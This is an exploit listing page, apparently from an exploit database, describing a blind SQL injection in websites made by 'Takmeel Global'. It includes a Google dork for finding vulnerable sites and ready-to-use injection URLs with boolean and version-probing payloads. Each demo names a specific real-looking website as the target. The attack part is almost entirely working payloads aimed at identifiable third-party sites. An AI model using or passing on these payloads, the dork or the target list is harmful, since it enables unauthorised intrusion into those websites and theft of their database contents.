Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | Varies | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2021-09-19 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N | 0.02192 | 0.50148 |
********************************************************* #Exploit Title: Takmeel Global - Blind Sql Injection Vulnerability #Date: 2021-09-19 #Exploit Author: Behrouz Mansoori #Google Dork: "by Takmeel Global" #Category:webapps #Tested On: windows 10, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://nisreenkayyali.com/project-detail.php?id=25%27%20and%20true--+ * https://nisreenkayyali.com/project-detail.php?id=25%27%20and%20false--+ * https://nisreenkayyali.com/project-detail.php?id=25%27%20and%20substring(@@version,1,1)=5--+ ### Demo 2: * http://www.glsuae.com/projects.php?id=2%27%20and%20true--+ * http://www.glsuae.com/projects.php?id=2%27%20and%20false--+ * http://www.glsuae.com/projects.php?id=2%27%20and%20substring(@@version,1,1)=5--+ ### Demo 3: * http://investmentengineering.ae/en/project-detail.php?id=240%27%20and%20true--+ * http://investmentengineering.ae/en/project-detail.php?id=240%27%20and%20false--+ * http://investmentengineering.ae/en/project-detail.php?id=240%27%20and%20substring(@@version,1,1)=1--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.